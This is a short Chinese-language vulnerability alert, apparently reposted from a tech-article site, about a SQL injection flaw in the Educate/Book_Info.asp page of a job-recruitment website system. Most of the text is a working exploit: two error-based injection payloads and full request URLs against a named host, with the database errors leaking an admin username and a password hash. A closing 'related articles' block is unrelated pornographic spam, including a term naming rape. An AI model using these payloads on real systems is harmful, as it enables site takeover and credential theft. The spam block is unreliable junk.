網絡求職招聘人才網站系統正式版漏洞漏洞預警 -電腦資料

電腦資料時間：2019-01-01 我要投稿

【m.rusnota.com - 電腦資料】

漏洞出現在Educate/Book_Info.asp

此處注入點雖然過濾了一些關鍵字但是我們還是可以盲注的可以利用sqlmap跑出

exp：如下

查詢管理賬號：+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)

查詢管理密碼：+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)

http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07'

將 nvarchar 值 'hackbase' 轉換為數據類型為 int 的列時發生語法錯誤，

，

/Educate/Book_Info.asp，行 8

http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07'

將 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 轉換為數據類型為 int 的列時發生語法錯誤。

/Educate/Book_Info.asp，行 8

相關文章

色逼阁网页,在线看的h网导航,亚洲日韩aⅴ在线视频,小清欢在线全文阅读,AV电影网址免费观看,自拍偷拍影音先锋,多人疯狂派对欧美XXX,强奸福利社,东北女人大叫受不了了